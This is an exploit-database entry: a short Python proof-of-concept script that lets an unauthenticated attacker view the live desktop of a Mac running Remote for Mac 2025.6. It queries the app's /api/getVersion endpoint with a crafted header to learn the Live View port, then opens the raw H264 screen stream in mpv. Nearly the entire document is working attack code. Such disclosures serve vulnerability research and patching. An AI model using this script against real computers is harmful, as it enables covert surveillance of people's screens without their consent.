📄 Remote for Mac 2025.6 Desktop Stream Disclosure

# Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Stream
    Exploit
    # Date: 2025-05-27
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://rs.ltd
    # Software Link: https://rs.ltd/latest.php?os=mac
    # Version: 2025.6
    # Tested on: macOS Mojave 10.14.6
    #!/usr/bin/env python3
    
    '''
    Remote for Mac 2025.6 - Unauthenticated Desktop Stream Exploit
    Vulnerable Component: Helper app Live View feature (raw H264 over TCP)
    Live View H264 per default is enabled.
    
    - Works when "Allow unknown devices" setting is enabled (default: disabled)
    - mpv required
    '''
    
    import requests, subprocess, urllib3, sys, time
    urllib3.disable_warnings()
    
    def p(s):
        try:
            i,p=s.split(':'); return i, int(p)
        except:
            print("Usage: python live.py <IP:PORT>"); sys.exit(1)
    
    def port(i,pt):
        try:
            r=requests.get(f"https://{i}:{pt}/api/getVersion",
    headers={"X-LiveView":"fixed"}, verify=0, timeout=5)
            return r.json().get('liveview.port')
        except:
            return None
    
    def mpv(i,p):
        print("Streaming...")
    
        process = subprocess.Popen(['mpv', '--no-terminal',
    '--profile=low-latency', '--hwdec=auto', '--untimed', '--no-cache',
    '--osc=no', '--title=Remote for Mac Stream Exploit', f'tcp://{i}:{p}'])
        try:
            while True:
                time.sleep(1)
        except KeyboardInterrupt:
            process.terminate()
    
    
    if __name__ == "__main__":
        if len(sys.argv)!=2: print("Usage: python live.py <IP:PORT>");
    sys.exit()
        i,pt = p(sys.argv[1])
        if (lp:=port(i,pt)): mpv(i,lp)
        else: print("Error: No LiveView port")